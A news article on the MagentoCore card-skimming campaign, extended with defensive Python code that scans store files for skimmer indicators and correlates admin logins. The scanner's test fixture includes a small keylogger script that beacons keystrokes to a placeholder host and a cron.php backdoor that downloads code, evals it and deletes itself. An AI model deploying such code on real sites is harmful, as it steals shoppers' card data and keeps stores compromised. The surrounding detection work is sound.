Thousands of e-commerce websites infected with “MagentoCore” malware that skims payment details

Thousands of e-commerce stores across the globe have been found to be unwittingly hosting a dangerous piece of malware that skims payment details. The malware, which has been stealing the payment details of thousands of shoppers worldwide, is reported to be infecting as many as 50 new stores each day.

Willem de Groot, a prominent Dutch security researcher and blogger, uncovered the infections; he named the malware ‘MagentoCore’ because it targets the popular e-commerce platform Magento.

In a post on his blog, de Groot writes: “Online skimming – your identity and card are stolen while you shop – has been around for a few years, but no campaign has been so prolific as the MagentoCore.net skimmer. In the last 6 months, the group has turned 7339 individual stores into zombie money machines, to the benefit of their illustrious masters.”

He adds, “The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months.”

Based on his daily scans, de Groot found that new stores were being hijacked at a pace of 50 to 60 per day over the two weeks immediately preceding his post (dated August 31, 2018). He also points out that although the attackers have targeted multi-million-dollar, publicly traded companies, the real victims are the customers, whose card details and identities are stolen and may be misused.

MagentoCore gains access to an e-commerce site mostly by brute force: automated attempts at large numbers of passwords against the store’s admin login, sometimes running for months. Once a password works, the attackers add a piece of JavaScript to the site’s HTML template. That script records customers’ keystrokes and sends the captured data in real time to the attackers’ server, which, according to de Groot, is “registered in Moscow”. Everything a customer types, including usernames, passwords and credit card data, is thus stolen.

Willem de Groot adds, “The malware includes a recovery mechanism as well. In the case of the Magento software, it adds a backdoor to cron.php. That will periodically download malicious code, and, after running, delete itself, so no traces are left.”
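The two artefacts described above, an injected script in a checkout-path template and a download-run-delete backdoor in cron.php, are what a responder has to find. The scanner below is an added example, not code from the article or from Willem de Groot; it runs a small set of indicator patterns over HTML/JS assets and PHP entry points and flags any script loaded from a host outside an allowlist. The allowlist, the indicator patterns, the `.invalid` hostname and the contents of `SAMPLE_FILES` are all assumptions constructed for illustration.

```python
"""Scan checkout-path HTML/JS assets and cron.php for skimmer-style indicators.

Added example, not code from the article or from Willem de Groot. The files in
SAMPLE_FILES are constructed to mimic the pattern the article describes (a script
injected into an HTML template that captures keystrokes and beacons them out,
and a cron.php that fetches remote code, runs it and deletes itself). The
allowlist, the indicator patterns and the .invalid hostname are assumptions.
"""
import re
from typing import Dict, List

# Hosts this store is expected to load scripts from (assumption for the example).
ALLOWED_SCRIPT_HOSTS = {"shop.example.com", "cdn.example.com"}

# Indicators worth a manual look in any asset loaded during checkout.
JS_INDICATORS = {
    "keystroke_capture": re.compile(r"addEventListener\(\s*['\"](?:keyup|keydown|keypress|input)['\"]"),
    "form_scrape": re.compile(r"querySelectorAll\(\s*['\"]input"),
    "exfil_beacon": re.compile(r"new Image\(\)|\.src\s*=\s*['\"]https?://|sendBeacon\(|XMLHttpRequest"),
    "obfuscation": re.compile(r"atob\(|String\.fromCharCode|(?:\\x[0-9a-f]{2}){2}", re.I),
}

# Indicators consistent with a download-run-delete backdoor in a PHP cron entry point.
PHP_INDICATORS = {
    "remote_fetch": re.compile(r"(?:file_get_contents|curl_init|fopen)\(\s*['\"]https?://"),
    "dynamic_exec": re.compile(r"\beval\(|\bassert\(|create_function\(|\bsystem\(|\bshell_exec\("),
    "decode": re.compile(r"base64_decode\(|gzinflate\(|str_rot13\("),
    "self_delete": re.compile(r"unlink\(\s*__FILE__\s*\)"),   # self-removal, as the article describes
}

SCRIPT_SRC = re.compile(r"<script[^>]+src\s*=\s*['\"]([^'\"]+)['\"]", re.I)


def external_script_hosts(html: str) -> List[str]:
    """Hosts referenced by <script src=...> that are not on the allowlist."""
    hosts = []
    for src in SCRIPT_SRC.findall(html):
        m = re.match(r"(?:https?:)?//([^/]+)", src)
        if m and m.group(1).lower() not in ALLOWED_SCRIPT_HOSTS:
            hosts.append(m.group(1).lower())
    return hosts


def scan_asset(name: str, content: str) -> List[str]:
    """Return the indicator labels that fire for one file (empty list = nothing found)."""
    if name.endswith(".php"):
        return [label for label, rx in PHP_INDICATORS.items() if rx.search(content)]
    hits = [label for label, rx in JS_INDICATORS.items() if rx.search(content)]
    hits += [f"external_script:{h}" for h in external_script_hosts(content)]
    return hits


def scan_all(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan every file; in practice walk the real template/skin/js trees instead."""
    return {name: scan_asset(name, content) for name, content in files.items()}


def suspicious(files: Dict[str, str]) -> List[str]:
    """Names of files that triggered at least one indicator, sorted for stable reporting."""
    return sorted(name for name, hits in scan_all(files).items() if hits)


# Constructed sample files (skimmer.invalid is a placeholder, not a real indicator).
SAMPLE_FILES = {
    "template/footer.html": """<footer>(c) Example Shop</footer>
<script src="https://cdn.example.com/app.js"></script>
<script src="//skimmer.invalid/js/mage.js"></script>""",
    "js/checkout.min.js": "(function(){var d='';document.addEventListener('keyup',function(e){d+=e.key});"
                          "setInterval(function(){(new Image()).src='https://skimmer.invalid/c?d='+btoa(d);},5000);})();",
    "js/clean.js": "document.querySelector('#go').addEventListener('click',function(){});",
    "cron.php": "<?php $c=file_get_contents('https://skimmer.invalid/p');eval(base64_decode($c));unlink(__FILE__);",
}

if __name__ == "__main__":
    for name, hits in scan_all(SAMPLE_FILES).items():
        print(f"{name}: {', '.join(hits) or 'clean'}")
```

Every hit is a lead for manual review, not a verdict: legitimate analytics or payment scripts also register keystrokes and beacon data out, which is why the allowlist of expected script hosts does most of the work. Because the backdoor removes itself after running, a clean cron.php at the time of the scan proves little; compare the file against the vendor copy and look for the download-and-execute logic in crontab entries and other PHP entry points as well.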

How to deal with an infection…

Any e-commerce store that has detected the presence of a skimmer should focus on doing the following things, as per Willem de Groot:

  • Finding out how the attackers got in. Check whether any staff computers are infected by analysing back-end (admin) logs and correlating login activity with staff IP addresses and working hours; anomalies can point to the compromised machine or to the session the attacker hijacked.
  • Finding the backdoors and unauthorized changes in the store’s codebase.
  • Closing or blocking every path the attackers used for unauthorized access.
  • Removing the skimmer, backdoors and any other malicious code, then reverting to a known-good copy of the codebase where possible. (Willem de Groot says, “Malware is often hidden in default HTML header/footers, but also in minimized, static Javascript files, hidden deep in the codebase. You should check all HTML/JS assets that are loaded during the checkout process.”)
  • Implementing strong security procedures to prevent future infections.
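The first step of this checklist, correlating back-end logs with staff IPs and working hours, is mechanical enough to script. The following is an added example, not code from the article or from Willem de Groot’s post: it parses admin login events, flags the repeated failures from one address that a brute-force run leaves behind, and then reports any successful login from an unknown account, from an address the staff member does not normally use, or outside office hours. The log line format, the staff roster, the office hours and every line of `SAMPLE_LOG` are constructed for illustration.

```python
"""Correlate admin-panel login events with the staff roster and office hours.

Added example, not from the article or from Willem de Groot's post. The log
line format, the staff roster, the office hours and every event in SAMPLE_LOG
are constructed for illustration; point the parser at your real admin/auth log
and load the roster from your own records.
"""
import re
from collections import Counter
from datetime import datetime, time
from typing import Dict, List, Set, Tuple

# Assumed format: "<ISO local timestamp> admin_login user=<u> ip=<ip> result=<success|failure>"
LINE = re.compile(
    r"^(?P<ts>\S+) admin_login user=(?P<user>\S+) ip=(?P<ip>\S+) result=(?P<result>success|failure)$"
)

STAFF_IPS: Dict[str, Set[str]] = {          # constructed roster: user -> usual source IPs
    "jsmith": {"198.51.100.10"},
    "akumar": {"198.51.100.11", "198.51.100.12"},
}
WORK_START, WORK_END = time(8, 0), time(18, 0)  # Mon-Fri office hours (assumption)
BRUTE_FORCE_THRESHOLD = 5                        # failed logins from one IP before flagging


def parse(lines: List[str]) -> List[dict]:
    """Keep only admin_login lines and split them into fields."""
    events = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue                      # unrelated log line
        events.append({"ts": datetime.fromisoformat(m["ts"]),
                       "user": m["user"], "ip": m["ip"], "result": m["result"]})
    return events


def analyse(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (category, detail) findings: brute force first, then per-success anomalies."""
    events = parse(lines)
    findings: List[Tuple[str, str]] = []

    failures = Counter(e["ip"] for e in events if e["result"] == "failure")
    for ip, n in failures.items():
        if n >= BRUTE_FORCE_THRESHOLD:
            findings.append(("brute_force", f"{ip} had {n} failed admin logins"))

    for e in events:
        if e["result"] != "success":
            continue
        if e["user"] not in STAFF_IPS:
            findings.append(("unknown_user", f"{e['user']} logged in from {e['ip']}"))
        elif e["ip"] not in STAFF_IPS[e["user"]]:
            findings.append(("unknown_ip", f"{e['user']} logged in from {e['ip']}"))
        off_hours = not (WORK_START <= e["ts"].time() < WORK_END) or e["ts"].weekday() >= 5
        if off_hours:
            findings.append(("off_hours", f"{e['user']} logged in at {e['ts'].isoformat()}"))
    return findings


# Constructed log: a normal staff day, a staff login from an unexpected address,
# and a brute-force run ending in a successful login on a generic account at night.
SAMPLE_LOG = """
2018-08-20T09:02:11 admin_login user=jsmith ip=198.51.100.10 result=success
2018-08-20T14:00:00 admin_login user=jsmith ip=203.0.113.9 result=success
2018-08-20T22:41:03 admin_login user=admin ip=192.0.2.55 result=failure
2018-08-20T22:41:05 admin_login user=admin ip=192.0.2.55 result=failure
2018-08-20T22:41:07 admin_login user=admin ip=192.0.2.55 result=failure
2018-08-20T22:41:09 admin_login user=admin ip=192.0.2.55 result=failure
2018-08-20T22:41:11 admin_login user=admin ip=192.0.2.55 result=failure
2018-08-20T22:41:13 admin_login user=admin ip=192.0.2.55 result=success
2018-08-21T10:15:40 admin_login user=akumar ip=198.51.100.12 result=success
2018-08-21T10:16:02 cache_flush user=akumar
""".strip().splitlines()

if __name__ == "__main__":
    for category, detail in analyse(SAMPLE_LOG):
        print(f"[{category}] {detail}")
```

The same correlation applies to admin session identifiers: a session that starts on a staff address and is later used from elsewhere is the hijacked-session case the checklist mentions. A brute-force run spread over months, as the article describes, will not show up as a burst, so also count failures per account and per address over the whole retained log, not only per day.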

E-commerce companies that don’t have much experience with forensic analysis can also hire the services of a professional.

Strong passwords, regular patching help prevent infection

Strong passwords, sound password management and regular patching go a long way toward preventing infection, not just by ‘MagentoCore’ but by malware in general.

Passwords need to be strong, with a mix of upper- and lower-case letters, numbers and non-alphanumeric characters, and they need to be changed regularly.

E-commerce businesses need a stringent patching schedule, with patches applied at least once a week, and more often for internet-facing systems such as the store itself.

Remember that cybercriminals are constantly on the lookout for unpatched websites with known security vulnerabilities.
